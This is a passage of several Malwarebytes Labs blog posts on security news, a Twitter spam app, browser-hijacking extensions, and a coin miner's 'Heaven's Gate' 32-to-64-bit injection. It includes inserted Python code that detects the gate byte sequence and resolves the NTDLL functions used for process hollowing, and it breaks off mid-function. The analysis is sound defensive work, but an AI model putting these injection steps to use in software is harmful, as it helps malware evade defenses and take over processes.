  • Designates best standards and obliges companies to follow them. There’s currently no consistent, agreed-upon best cybersecurity practices for companies to follow.
  • Power to investigate and force remediation. In contrast to US defense contractors who handle critical infrastructure, who were not obligated to report breaches until 2015 and to date have not lost any contracts due to loss of classified data, Singapore’s draft bill grants a cybersecurity officer the authority both to investigate a critical infrastructure breach and to compel remediation along industry best practices.
  • Licenses infosec corps. While this could be a little iffy in the implementation, holding companies that audit critical infrastructure to an agreed-upon standard benefits everyone. Infrastructure owners know precisely what services they are paying for, cybersecurity officials can judge the impact of standardized services more accurately, and no one has to deal with a Norse Corp.
The not so good
  • Criminal sanctions for offenses. While seemingly a no-brainer, breaches are rarely due to a single individual’s malfeasance, and much more often the end result of a sick corporate process. A more effective deterrent would be fines levied at the corporate level, and large enough to hurt. While an ineffective company can lose a handful of employees quite easily, it would feel the loss of a percentage of profit much more acutely.
  • Secrecy. Many sections within the bill contain provisions for non-disclosure and corresponding fines and imprisonment for anyone speaking out about a breach in a non-approved way. From a governance perspective, this makes sense. Singapore is deriving its authority to monitor critical infrastructure by classifying breaches as a security threat, and a classic belief of governments is that one does not speak publicly of security threats. Network threats are different. Configurations and applications used by a shipping company can have significant overlap with those used at non-critical corporations. Transparency and information sharing not only pressure a breached company to demonstrate an adequate remediation but also offer lessons learned that can keep hundreds of less critical organizations safe. Sunlight and sharing are proven methods for defenders to propagate best solutions to everyone.
What does it mean?

Traditionally, information security has been viewed as the responsibility of individual companies, and not a particularly important one at that. Efforts of countries like Singapore to centralize cyberthreat defense and vulnerability remediation are an attempt to acknowledge the reality that breached infrastructure affects everyone. A hack might stay within an offshore drilling company, but the knock-on effects to shipping, trade, and the environment can create an impact on millions of citizens.

While the law has not traditionally been responsive to technology needs, that is gradually changing. With input from industry leaders and privacy advocates, technology law has the potential to change for our benefit.

Check out the full text of the bill here.

The post Singapore government gets into the network defense game appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Who visits your Twitter profile” spam app brings week of chaos

Malwarebytes - Tue, 01/23/2018 - 19:17

Twitter spam has been around forever, and rogue apps asking for installs in return for a cool feature (to be more accurate, spamming your contacts) are a constant thorn in our Twittery sides. Over the weekend, we observed a new Twitter app doing the rounds and causing a lot of congestion on people’s timelines.

What is it?

We first noticed this when a number of our contacts using the #FBPE (follow back, pro Europe) hashtag to form networks and make new friends started spamming tweets similar to the below:


The spam reads as follows:

Goooo!! Click for more information: Who visits your Twitter profile 100% safe, 100% working Click here, available for iOS and Android

Here’s another one:


Sign in and download this fantastic app – only available today

Regardless of the spam message used, all the tweets directed people to visit a website located at


How does it spread?

People click the link and are presented with the below website:


There’s not a lot to do besides hitting the large “Connect with Twitter” button, and sure enough, doing just that will direct eager clickers to the app install page.


It says:

Authorize Recent Visits 24H to use your account?

This application will be able to:

Read tweets from your timeline

See who you follow and follow new people

Update your profile

Find Tweets for you

Will not be able to:

Access your Direct Messages

See your email address

See your Twitter password

In other words, a fairly standard Twitter app permission list.

Tracking the spread

This could have been a bit of a disaster for those on the FBPE hashtag mentioned, which itself is being used to grow follower count and connect with like-minded individuals. Any app claiming to provide information about “profile views” in this situation could have resulted in an accelerated spread, though we doubt they were specifically targeted—it was spreading just fine elsewhere, as we’ll see.

Either way, those on the hashtag quickly figured out it was a scam and took steps to purge it:

One of the other primary drivers of these spam messages was the below message:

Touch the screen and enter the web – You can know who has visited your profile

This was still actually doing the rounds as of yesterday, with a little over 900 results in a simple browser search before it refused to load any more entries:


What damage can it do?

As with all things, that depends on the ultimate aim of the scammer. Some just want to spam their website; others will pop an advert or 12, and the worst of the bunch may try to have you download and run some malware. At the time of testing, all this seemed to do was promote the app across timelines and encourage more installs, so the main aggravation here is the knowledge that you installed something useless, and then started beaming said uselessness to all of your contacts. Not a great look, however you stack it.

How do I remove it?

Thankfully, this is an easy one to pull off. Head over to your Applications tab in Twitter via Settings and Privacy, and give your apps list a spring clean:


Some of the apps you may find there could be outdated or no longer updated; if that’s the case, remove them. You don’t want to end up in a situation such as this. Once you’re happy with the end result, simply save and go back to your homepage safe in the knowledge that you won’t be posting any more bad tweets (at least, not automated ones).


A number of similar campaigns were tracked and mapped out by Erin Gallagher, one of which was making use of the URL ultimasvisitass(dot)tk, with some impressive graphs of the spread across three days produced in Gephi, the open source visualization program. At the time of writing, some of the URLs in play don’t load, and checkvisitss redirects to lasttvisitss(dot)tk, which is fully functional and offering up an app install. All of the sites involved seem to be registered through anonymous registration services, so there’s no real way to figure out who’s behind this batch of app installs.

No matter how you come across these sites, we’d advise you not to bother giving these apps permission. The “See who visited you” routine has been around for years on Twitter and Tumblr, and going even further back to Myspace. In all cases, none of these things ever seems to work; they only serve to annoy, spam ads, or offer surveys.

While it might be useful to find out who’s been on your page, it’s really not worth the effort of installing a spam app and putting off all of your visitors from wanting to interact with you.

Profile viewer apps offer much, but deliver little. Move your hand away from the Install button and go about your day. Your social media profile’s reputation will thank you for it.

The post “Who visits your Twitter profile” spam app brings week of chaos appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 15 – January 21)

Malwarebytes - Mon, 01/22/2018 - 17:53

Last week on Labs, we gave you some background information about cookies, specifically which ones to worry about and why. We also warned you about scams surrounding the Mega Millions winner, who promised to donate his money to good causes.

We analyzed a cryptocurrency miner using a very old technique called Heaven’s Gate to make injections into 64-bit processes from 32-bit loaders. On top of that, we pointed out that there are Chrome and Firefox extensions using “forced installs” that hide from users and hijack browsers. And last but not least, we enticed you to think about some practical New Year’s resolutions related to cybersecurity and privacy.

Other news
  • Google acknowledged a known issue where a bug in the Cast software may incorrectly send a large amount of network traffic, which can slow down or temporarily impact Wi-Fi networks. (Source: Google Support)
  • Soon after, Google announced an update for Android phones so that interaction with Chromecast video-streaming devices and Google Home smart speakers won’t whack your Wi-Fi. (Source: CNet)
  • A version of the Satori malware exploits one or more weaknesses in the Claymore Miner, replacing the owner’s wallet address with an address controlled by the attacker. (Source: ArsTechnica)
  • BlackWallet, another site in the booming cryptocurrency wallet sector, lost their users’ cryptocurrency after what looks like a DNS hijacking attack. (Source: Naked Security)
  • Dark Caracal, a surveillance toolkit-for-hire, has been used to suck huge amounts of data from Androids and Windows desktop PCs around the world. (Source: The Register)
  • A British 15-year-old gained access to intelligence operations in Afghanistan and Iran by pretending to be the head of the CIA. (Source: The Telegraph UK)
  • OnePlus announced that up to 40,000 customers were affected by the security breach that caused the company to shut down credit card payments for its online store earlier this week. (Source: The Verge)
  • The SamSam ransomware group seems to have gotten off to a “great” start in 2018, hitting several high-profile targets such as hospitals, a city council, and an ICS firm. (Source: Bleeping Computer)
  • GhostTeam adware can steal Facebook accounts and surreptitiously push ads. It was found on 53 apps on Google Play. (Source: Trendlabs)
  • A confusing drop-down menu was the cause of the false missile warning that scared Hawaii. (Source: The Washington Post)
  • Researchers have identified a powerful new Android malware strain called Skygofree capable of eavesdropping on WhatsApp messages and much more. (Source: Threatpost)
  • Lack of authentication was the culprit behind leaks of customer details in an adult VR application called SinVR. (Source: Digital Interruption)

Stay safe, everyone!

The post A week in security (January 15 – January 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity New Year’s resolutions, you say? Why not.

Malwarebytes - Fri, 01/19/2018 - 16:00

It’s mid-January, and oh, how time flies. It wasn’t long ago that we bade farewell to 2017 and welcomed the new year with renewed hope and vigor. Of course, with such positivity comes a sense of an equally favorable outlook for the year ahead. However good that may sound, being faced with a tabula rasa may pose a challenge equivalent to writer’s block: We simply don’t know where to begin.

This is where resolutions come in.

It’s no surprise that our resolutions are usually about health, finances, relationships, and self-improvement. They’re the things that matter to us the most. As all of us live digital lives, too, why not think up cybersecurity New Year’s resolutions that concern our online health and safety as well?

10 cybersecurity resolutions for 2018

Exercise more. Learn a new skill or hobby. Save (more) money.

What most of us probably don’t realize is that these are actually goals, not resolutions. Resolutions are firm decisions you make to do or not do something for your benefit. Here’s a bonus: They are never time-oriented.

Without further ado, below are some New Year’s resolutions that we urge you, dear reader, to start doing in 2018.

(1) I will use two-factor authentication for all my online accounts. 2FA is awesome. Not only does it add security to your accounts by further verifying that you are who you say you are, it also protects you from those unlawfully attempting to access your account. So take advantage of these features if they are on offer.

(2) I will back up my files on a regular basis. Believe it or not, your files are in danger. If a strain of ransomware doesn’t hinder you from accessing them, theft, software bugs, or even mother nature would. Because of these, backing up has become an essential security and business continuity practice. Be sure to create multiple copies of personal and work files you can’t live without, and then store them in a number of physical and digital locations, such as an external hard drive or cloud storage.

(3) I will only visit sites that use HTTPS. Not every website on the Internet—even popular ones, sadly—uses HTTPS. Even sadder is that not every one of us seems to mind entering our personally identifiable information (PII) onto HTTP sites in order to use their services. As more and more companies are beginning to realize that security must go hand-in-hand with privacy, it’s important that we start watching which sites we visit and where we enter our information. Opportunely, there are extensions you can install to your browser to automatically connect to HTTPS versions of websites. Take HTTPS Everywhere, for example.

(4) I will routinely review apps on my devices and uninstall those I no longer use or need. What first seems like the must-have app that everyone raves about today is then either abandoned or completely forgotten in the next few days. Unfortunately, out of sight, out of mind actually presents a security risk—this was the outcome of a study by Google a couple of years back. Why is it important to delete unused apps? Not only can unused apps still access and use your sensitive information, but your device could become compromised through vulnerabilities in the apps, especially those that are no longer maintained by the developer. Deleting unused apps will minimize those security risks—not to mention free up some space on your phone.

(5) I will use strong passwords and manage them well. By “strong” we mean long passwords with a combination of lowercase and uppercase letters, numbers, and special characters. And by “manage” we mean not committing all these complicated strings to memory but using software that can remember them and fill in the forms you used to fill in manually. I’m talking about password managers. No, paper and Post-Its don’t count. Neither does a master password list you created in Excel.

Read: Why you don’t need 27 different passwords

(6) I will update all my software in a timely manner. Doing this may be inconvenient for some users—particularly when the ill-timed notification pops up while in the middle of defeating that video game boss in hard mode—but think about the inconveniences, headache, hassle, and sleepless nights a vulnerable software could cause if cybercriminals were to successfully exploit it. You may have to retry beating that boss more than once, but there is no going back to how things were if your computing device is compromised.

(7) I will handle emails more carefully. Emails: Can’t live with them, can’t live without them. For some of us, they’re the only means to get in touch with others miles away. Unfortunately, emails are also one of the main avenues cybercriminals use to get into your system. In this day and age, clicking a link or opening an attachment can literally turn someone’s life around for the worse. So this year, before doing anything with that email, pause and think things through. Were you expecting an email from someone you know? Does the email seem fishy or “off” somehow? Verify the sender by hovering over the email address or going directly to the vendor’s website.

(8) I will think before I post. There’s no harm in posting on social media; however, sharing personal details can endanger your own privacy. You’re essentially making it easy for online miscreants and persistent threat actors to use your information in crafting a personalized social engineering attack against you. Not only that, the information you freely give away can be used to access your accounts or steal your identity.

Do you think you’ve been oversharing? That doesn’t mean you should go cold turkey, but it does mean that you need to tone down on posting stuff about yourself or people close to you. Ask questions: Why am I posting this? If I were the bad guy, what would they get out of this post? Should I really be posting this picture of my bank card?

(9) I will familiarize myself with the latest cybersecurity threats and scams. A long time ago, I overheard someone jokingly say that they don’t watch the news anymore because they’re allergic to bad news. When it comes to news about cybersecurity, we mostly hear or read about the bad stuff. But trust me, no matter how stressful the news can be—take Meltdown and Spectre catching everyone by surprise, for example—the more you know, the more you’re able to protect yourself against new threats. (That said, have you already applied the patches you need for Meltdown and Spectre? If not, this write-up by our very own Jérôme Boursier describes and links to the patches available for various hardware, OS, and software systems.)

(10) I will talk to my friends and family about cybersecurity and privacy. It may be a bit awkward at first, or you may be met with glazed over eyes, but you know this is important. These days, politics might dominate the conversation around cybersecurity, but it doesn’t have to be that way. Start off by commenting on a news report about an Internet scam or what some reporters might still call “a new computer virus.” Share any helpful tips you know for protecting against these threats, including any of the resolutions listed above or which cybersecurity program you use that blocks them. Work with what you know. Ask questions, and share your thoughts. They might learn a thing or two from you.

Act now

Making resolutions is one thing. Acting on them is another. In reality, we don’t need to wait for the first day of the year to clean up our computing habits. Resolve to make the small changes now. Whether 2018 will be the year you start building safe computing habits, reinforcing the good ones you already practice and ditching the old, is up to you. Act now and see where it takes you.

Have you come up with cybersecurity resolutions of your own? Share them with us in the comments below!

The post Cybersecurity New Year’s resolutions, you say? Why not. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Chrome and Firefox extensions block their removal to hijack browsers

Malwarebytes - Thu, 01/18/2018 - 16:00

What you don’t see won’t hurt you, must have been the reasoning of the threat actors who created the latest batch of extensions that make these browser hijackers even more difficult to remove. The extensions redirect users away from pages where they can disable or delete them in order to drive clicks up on YouTube videos or hijack searches.

The extensions, which have been found in both Chrome and Firefox browsers, block users from removing them either by closing pages with extensions/add-ons info, or by sending users to a different page, such as an apps overview page, where extensions aren’t listed.

In Firefox, this problem is relatively easy to circumvent, but for Chrome it takes a lot of digging—so much so that we suggest the fastest way to resolve the problem is to report it to Chrome or your favorite security solution so they (we) can take care of it. (Malwarebytes Premium and Business users are already protected from these threats by our website protection module.)

However, if you’re not a Premium customer, there are still some, admittedly involved, ways to get around these murky and persistent browser hijackers by recognizing, finding, and removing the extensions. Here’s what you can do.

For Chrome

First, we’re going to look at the Chrome extension called Tiempo en colombia en vivo, which is pushed by the method we previously described as a forced Chrome extension. The extension is detected by Malwarebytes as Rogue.ForcedExtension.

You can find the removal guide for Tiempo en colombia en vivo on our forums.

The extension keeps users out of Chrome’s extensions list by redirecting chrome://extensions/ to chrome://apps/?r=extensions, where the offending extension is not listed, as only the installed apps are shown.

Blocking JavaScript in Chrome doesn’t help in this case, as that setting only applies to sites and not to this (internal) page.


The clean method to stop extensions from redirecting your Chrome tabs is to start Chrome with extensions disabled. You can do this by adding the switch “--disable-extensions” to the command that runs Chrome.

But doing this will not offer you the option to remove any extensions, as Chrome will behave as if it has no extensions whatsoever. So this offers us no way to remove the extension from the list as you normally would.

Renaming the file 1499654451774.js in the extensions folder does help, however, and after a restart of Chrome, we can see the extension in the list of extensions. It shows up as corrupted because we renamed their JavaScript to something else, so it can’t find what it’s looking for.

Tip: To escape from a Chrome site that is trying to make you stay there, you can use Ctrl+T to open a new tab. The new tab will have focus, so you can then close the offending tab by clicking the “x” that lights up in red when you hover over the tab.

For Firefox

We also found a Firefox extension that displays similar behavior to the Chrome extension. This one was pushed by ad-rotators as a manual update for Firefox.

Malwarebytes detects this extension as PUP.Optional.FFHelperProtection. A full removal guide for FF Helper Protection can be found on our forums.

This extension blocks about:addons in background.js by looking for that string in the URL and closing the tab if the string is found.

This means that you can’t remove the extension manually.
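Both the Chrome and the Firefox variants described above rely on the same trick: a background script watches tab URLs for the browser’s extension-management page and either closes the tab or sends it somewhere else. The following is an added example, not code from Malwarebytes or from the extensions themselves: a small Python scanner that walks an unpacked extension directory (or a packed Firefox .xpi, which is a zip) and flags scripts that mention a management page and also call a tab-control API. The two sample scripts it scans are constructed here for the demonstration, and the regexes plus the “both signals in one file” heuristic are an assumption about what such anti-removal code tends to look like, not a signature for these specific extensions.

```python
import os
import re
import tempfile
import zipfile

# Constructed sample (not the real extension's code) of the anti-removal
# behaviour described above: a background script that watches tab URLs,
# closes tabs that open about:addons, and bounces chrome://extensions to a
# page where the extension is not listed.
SAMPLE_BACKGROUND_JS = r"""
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  if (tab.url && tab.url.indexOf("about:addons") !== -1) {
    chrome.tabs.remove(tabId);
  }
  if (tab.url && tab.url.indexOf("chrome://extensions") === 0) {
    chrome.tabs.update(tabId, { url: "chrome://apps/?r=extensions" });
  }
});
"""

# Constructed benign script: no management page, no tab control.
SAMPLE_BENIGN_JS = "chrome.runtime.onInstalled.addListener(() => console.log('ready'));\n"

# Pages from which a user would disable or remove an extension (assumed list).
MANAGEMENT_PAGES = re.compile(
    r"chrome://extensions|chrome://apps|about:addons|about:preferences", re.I)
# APIs that can close or redirect a tab the user is looking at (assumed list).
TAB_CONTROL = re.compile(
    r"\btabs\.(remove|update|create)\b|window\.close\b|location\.(href|replace|assign)\b", re.I)


def analyze_source(text: str) -> list:
    """Return the suspicious traits found in one script (empty list if none).
    Strong signal: a management page URL *and* a tab-control API in the same
    file. A management URL alone is reported as a weak signal."""
    pages = sorted({m.group(0).lower() for m in MANAGEMENT_PAGES.finditer(text)})
    controls = sorted({m.group(0) for m in TAB_CONTROL.finditer(text)})
    if pages and controls:
        return ["anti-removal: references %s and manipulates tabs via %s" % (pages, controls)]
    if pages:
        return ["weak: references management page(s) %s" % pages]
    return []


def scan_extension(root: str) -> dict:
    """Map every .js file with findings to its traits. `root` is either an
    unpacked extension directory (Chrome) or a packed .xpi (Firefox), which is a zip."""
    results = {}
    if zipfile.is_zipfile(root):
        with zipfile.ZipFile(root) as zf:
            for name in zf.namelist():
                if name.endswith(".js"):
                    hits = analyze_source(zf.read(name).decode("utf-8", "replace"))
                    if hits:
                        results[name] = hits
        return results
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".js"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = analyze_source(f.read())
            if hits:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results


def demo() -> dict:
    """Write the constructed samples into a throwaway unpacked extension and scan it."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "js"))
        with open(os.path.join(d, "js", "background.js"), "w") as f:
            f.write(SAMPLE_BACKGROUND_JS)
        with open(os.path.join(d, "js", "popup.js"), "w") as f:
            f.write(SAMPLE_BENIGN_JS)
        return scan_extension(d)


if __name__ == "__main__":
    for path, traits in demo().items():
        print(path, "->", "; ".join(traits))
```

Point scan_extension at a Chrome profile’s Extensions\<id>\<version> folder or at an .xpi from a Firefox profile’s extensions folder. A hit names the file you would rename or delete, which is the manual step described above for the Chrome case. Absence of a hit does not prove an extension clean: the strings can be assembled at runtime or obfuscated, so treat this as triage, not a verdict.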

Firefox, however, can be run in safe mode by holding down the Shift key while starting Firefox. Then confirm that you want to “Start in Safe Mode” in this prompt.

Firefox’s safe mode is most helpful, as you can see all the installed extensions while they are not active. Doing so allows you to manually remove the extension (and any others you might not want) in the same way you normally would. Click the “Remove” button in the extension’s description field, and you’re done.

If you are kept on a Firefox tab by JavaScript that keeps popping up prompts, and you are unable to close the window in the usual way, you can terminate Firefox using Task Manager. When you restart Firefox, it will not be able to restore the session for that tab.

How to avoid

While the extensions have been around for a few weeks, both are still in use in one form or another. In fact, the Tiempo en colombia en vivo extension was still available in the Chrome Web Store at the time of writing. Unfortunately, since both the Chrome and Firefox extensions mostly add themselves through forced installs, it’s not always possible to avoid getting them. The best we can offer is to stay vigilant as you surf and use an adblocker (that could help with blocking the Firefox extension). Though we’d like to add the obvious: Avoid actually downloading these extensions from web stores as well. In fact, it’s a good idea to read the fine print carefully for any browser extension you download.



Chrome extension: gbhodkgjhojjjggokjjlbccecdhkjjgl

Firefox extensions: {eb3ebb14-6ced-4f60-9800-85c3de3680a4}.xpi, {b91fcda4-88b0-4a10-9015-9365e5340563}.xpi

Stay safe out there.

The post New Chrome and Firefox extensions block their removal to hijack browsers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A coin miner with a “Heaven’s Gate”

Malwarebytes - Wed, 01/17/2018 - 16:00

You might call the last two years the years of ransomware. Ransomware was, without a doubt, the most popular type of malware. But at the end of last year, we started observing that ransomware was losing its popularity to coin miners. It is very much possible that this trend will grow as 2018 progresses.

From the point of view of the victim, this is a huge relief, because miners are not as much of a threat as ransomware. They slow down the system, yes, but once you get rid of them you can continue using your computer as before. No data is stolen or lost, as is the case with a ransomware infection.

From the point of view of a malware researcher, miners are so far disappointing. They don’t give enough interesting material for a deeper analysis, mostly because they are based on well-known open source components with little or no obfuscation.

However, from time to time, we find coin miners incorporating interesting tricks. In one recent sample, we observed a technique called “Heaven’s Gate” that allows the malware to make injections into 64-bit processes from 32-bit loaders. This trick is not new—its introduction dates to 2009—but it’s curious to see it implemented in this new sample captured in the wild.

Those who are beginners in malware analysis can read on for a guide about what Heaven’s Gate is and how to approach analyzing it.

Analyzed samples

This sample was found in the continuation of the Ngay campaign (more about it here). A background check on similar samples led me to the article by @_qaz_qaz, who described an earlier campaign with a similar sample. However, his analysis skipped details on the Heaven’s Gate technique.

Behavioral analysis

To observe the mentioned injection, we must run the sample on a 64-bit system. We can see that it runs an instance of notepad, with parameters typical for mining cryptocurrency:

Looking at the in-memory strings in ProcessExplorer, we can clearly see that it is not a real notepad running, but the xmrig Monero miner:

So, at this moment we’re confident that the notepad’s image has been replaced in memory, most probably by the RunPE (Process Hollowing) technique.

The main dropper is 32-bit, but it injects a payload into a 64-bit notepad:

The fun part is that this type of injection is not supported by the official Windows API. We can read/write the memory of 32-bit processes from a 64-bit application (using Wow64 API), but not the other way around.

There are, however, some unofficial solutions to this, such as the technique called “Heaven’s Gate.”

Heaven’s Gate overview

The Heaven’s Gate technique was first described in 2009 by a hacker nicknamed Roy G. Biv. Later, many adaptations were created, such as the library Wow64ext or, based on it, W64oWoW64. In a blog post from 2015, Alex Ionescu described mitigations against this technique.

But let’s have a look at how it works.

Running 32-bit processes on 64-bit Windows

Every 32-bit process that runs on a 64-bit version of Windows runs in a special subsystem called WoW64 that emulates the 32-bit environment. We can explain it as a 32-bit sandbox that is created inside a 64-bit process. So, first the 64-bit environment for the process is created. Then, inside it, the 32-bit environment is created. The application is executed in this 32-bit environment and it has no access to the 64-bit part.

If we scan the 32-bit process from outside, via a 64-bit scanner, we can see that it has both 32- and 64-bit DLLs inside. Most importantly, it has two versions of NTDLL: 32-bit (loaded from the directory SysWow64) and 64-bit (loaded from the directory System32):

However, the 32-bit process itself can’t see the 64-bit part and is limited to using the 32-bit DLLs. To make an injection to a 64-bit process, we’d need to use the 64-bit versions of appropriate functions.

Code segments

In order to access the forbidden part of the environment, we need to understand how the isolation is made. It turns out that it’s quite simple. Whether the CPU interprets code as 32-bit or 64-bit is decided by the code segment (CS) selector in use: 0x23 selects the 32-bit code segment and 0x33 the 64-bit one.

A normal (near) call or jump keeps the current code segment, so the code keeps running in whatever mode is set by default. Switching modes requires a far control transfer (a far call, far jump, or far return) that loads a new CS selector, and the malware does exactly that with a few assembler instructions.

Inside the miner: the Heaven’s Gate implementation

I will not do a full analysis of this miner because it has already been described here. Let’s jump directly to the place where the fun begins. The malware checks its environment, and if it finds that it’s running on a 64-bit system, it takes a different path to make an injection into a 64-bit process:

After some anti-analysis checks, it creates a new, suspended 64-bit process (in this case, it is a notepad):

This is the target into which the malicious payload is going to be injected.

As we discussed before, in order to inject the payload into a 64-bit process, we need to use the appropriate 64-bit functions.

First, the loader takes a handle to a 64-bit NTDLL:

What happens inside this function get_ntdll requires some deeper explanation. As a reference, we can also have a look at the analogical code in the ReWolf’s library.

To get access to the 64-bit part of the process environment, we need to manipulate the segments selectors. Let’s see how our malware enters the 64-bit mode:

This code seems to be directly copied from the open source library:

The segment selector 0x33 is pushed on the stack. Then the malware calls the very next instruction; the side effect of that call is that the address of the next instruction (the return address) is also pushed on the stack.

The pushed return address is then fixed up by adding 5 bytes, so that it points just past the RETF instruction:

At the end, the instruction RETF is executed. RETF is a “far return”; in contrast to the usual RET, it lets you specify not only the address where execution should resume but also the code segment. In 32-bit mode it pops two DWORDs from the stack: the new EIP first, then the new CS. So, when the RETF is hit, the actual return address is:


Thanks to the changed segment, the code that starts at the specified address is interpreted as 64-bit. So, the code that is visible under the debugger as 32-bit…

…is, in reality, 64-bit.
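To make the gate concrete, here is an added Python example (not from the post or from the analyzed sample) that does two things: it scans a byte buffer for the exact four-instruction sequence above and reports where the 64-bit code begins, and it steps through the gate’s effect on the stack to show what RETF pops. The instruction encodings are taken from the Intel manual; the buffer it scans, including the four-byte 64-bit stub after the gate, is constructed for the example.

```python
# Encoding of the four-instruction gate discussed above (x86 opcodes per the
# Intel manual; the byte string is assembled here, not copied from the sample):
#   6A 33             push 0x33            ; 64-bit code segment selector
#   E8 00 00 00 00    call $+5             ; pushes the address of the next instruction
#   83 04 24 05       add dword [esp], 5   ; move that address just past the RETF
#   CB                retf                 ; pops EIP, then CS: execution continues as x64
GATE = bytes.fromhex("6A33" "E800000000" "83042405" "CB")


def find_gates(code: bytes, base: int = 0) -> list:
    """Return (gate_address, x64_entry_address) for each gate found in `code`.
    The x64 entry is the byte right after RETF, i.e. gate + len(GATE) = gate + 12."""
    hits = []
    pos = code.find(GATE)
    while pos != -1:
        hits.append((base + pos, base + pos + len(GATE)))
        pos = code.find(GATE, pos + 1)
    return hits


def emulate_gate(gate_addr: int) -> tuple:
    """Step through the gate's effect on the stack and return what RETF pops:
    (EIP, CS). The stack is modelled as a list whose index 0 is ESP."""
    stack = []
    stack.insert(0, 0x33)                 # push 0x33
    stack.insert(0, gate_addr + 2 + 5)    # call $+5: return address = address right after the CALL
    stack[0] += 5                         # add dword [esp], 5: skip "add" (4 bytes) + "retf" (1 byte)
    eip = stack.pop(0)                    # retf pops EIP ...
    cs = stack.pop(0) & 0xFFFF            # ... then CS (a full DWORD in 32-bit mode, low 16 bits used)
    return eip, cs


# Constructed sample: 32-bit filler, the gate, then a 64-bit stub. The stub bytes
# 4C 89 24 24 decode as "mov [rsp], r12", mirroring the first thing the post
# shows the 64-bit code doing; the NOPs on either side are padding.
SAMPLE = b"\x90" * 16 + GATE + b"\x4C\x89\x24\x24" + b"\x90" * 4


def describe(code: bytes, base: int) -> list:
    """Combine scan and emulation: for every gate, report where 64-bit execution
    starts and check that the emulated RETF target agrees with the scan."""
    out = []
    for gate, entry in find_gates(code, base):
        eip, cs = emulate_gate(gate)
        assert (eip, cs) == (entry, 0x33)
        first = code[entry - base:entry - base + 4].hex()
        out.append({"gate": gate, "x64_entry": entry, "first_bytes": first})
    return out


if __name__ == "__main__":
    for hit in describe(SAMPLE, 0x401000):
        print("gate at %#x, 64-bit code starts at %#x (bytes %s)"
              % (hit["gate"], hit["x64_entry"], hit["first_bytes"]))
```

Run against a dumped 32-bit section, the scanner gives you the offset to hand to a disassembler in 64-bit mode, which is the view switch the post describes doing in PE-bear. The pattern assumes the verbatim ReWolf-style sequence; a variant that computes the selector or the return address differently would need its own pattern.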

For the fast switching of those views, I used a feature of PE-bear:

And this is how this piece of code looks, if it is interpreted as 64-bit:

So, the code that is executed here is responsible for moving the content of the R12 register into a variable on the stack, and then switching back to 32-bit mode. This is done for the purpose of getting the 64-bit Thread Environment Block (TEB), from which we next fetch the 64-bit Process Environment Block (PEB)—check the analogous code.

The 64-bit PEB is used as a starting point to search the 64-bit version of NTDLL. This part is implemented in a casual way (a “vanilla” implementation of this technique can be found here) using a pointer to the loaded libraries that is one of the fields in the PEB structure. So, from PEB we get a field called Ldr:

Ldr is a structure of the type _PEB_LDR_DATA. It contains an entry called InMemoryOrderModuleList:

This list contains all the loaded DLLs that are present in the memory of the examined process. We browse through this list until we find the DLL of our interest that, in this case, is NTDLL. This is exactly what the mentioned function get_ntdll does. In order to find the appropriate name, it calls the following function—denoted as is_ntdll_lib—that checks the name of the library character-by-character and compares it with ntdll.dll. It is an equivalent of this code.

If the name matches, the address to the library is returned in a pair of registers:

Once NTDLL is found, the loader only needs to fetch the addresses of the appropriate functions. It does this by browsing the export table of the DLL:

The following functions are being fetched:

  • NtUnmapViewOfSection
  • NtGetContextThread
  • NtAllocateVirtualMemory
  • NtReadVirtualMemory
  • NtWriteVirtualMemory
  • NtSetContextThread

As we know, these functions are typical for the RunPE technique. First, NtUnmapViewOfSection is used to unmap the original PE file from the target process. Then memory in the remote process is allocated, and the new PE is written there. Finally, the thread context of the process is changed so that execution starts from the injected module.

The addresses of the functions are saved and later called (similarly to this code) to manipulate the remote process.
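The two resolution steps described above (matching the module name the way is_ntdll_lib does, then walking the export directory for the Nt* functions) are shown below as an added Python example. It is not code from the miner or from the open-source implementation the post refers to. The PE image it parses is constructed in the script itself: a minimal PE32+ header with only an export directory, laid out the way a module appears in memory (RVA equals offset), which is how the Heaven’s Gate stub sees NTDLL through the PEB. The base address NTDLL_BASE and the function RVAs are made-up values for the demo, and NtClose is added as a decoy export that the stub does not ask for.

```python
import struct

# Functions the post lists as being resolved from the 64-bit NTDLL by the RunPE stub.
RUNPE_IMPORTS = [
    "NtUnmapViewOfSection",
    "NtGetContextThread",
    "NtAllocateVirtualMemory",
    "NtReadVirtualMemory",
    "NtWriteVirtualMemory",
    "NtSetContextThread",
]

# Constructed base address for the demo; not a real load address.
NTDLL_BASE = 0x00007FF800000000


def is_ntdll_name(base_dll_name: bytes) -> bool:
    """Equivalent of the post's is_ntdll_lib: compare the UTF-16LE BaseDllName
    of an LDR_DATA_TABLE_ENTRY with "ntdll.dll" character by character, ignoring case."""
    target = "ntdll.dll"
    chars = base_dll_name.decode("utf-16-le", errors="replace")
    if len(chars) != len(target):
        return False
    return all(a.lower() == b for a, b in zip(chars, target))


def parse_exports(image: bytes) -> dict:
    """Walk the export directory of a PE32+ image mapped as in memory (RVA == offset)."""
    if image[:2] != b"MZ":
        raise ValueError("missing DOS header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                       # skip signature and COFF header
    if struct.unpack_from("<H", image, opt)[0] != 0x20B:
        raise ValueError("not a PE32+ (64-bit) image")
    export_rva = struct.unpack_from("<I", image, opt + 0x70)[0]  # DataDirectory[0].VirtualAddress
    if export_rva == 0:
        return {}
    # IMAGE_EXPORT_DIRECTORY: NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    n_names, funcs, names, ords = struct.unpack_from("<IIII", image, export_rva + 0x18)
    exports = {}
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", image, names + 4 * i)[0]
        name = image[name_rva:image.index(b"\0", name_rva)].decode("ascii")
        ordinal = struct.unpack_from("<H", image, ords + 2 * i)[0]
        exports[name] = struct.unpack_from("<I", image, funcs + 4 * ordinal)[0]
    return exports


def resolve(image: bytes, base: int, wanted) -> dict:
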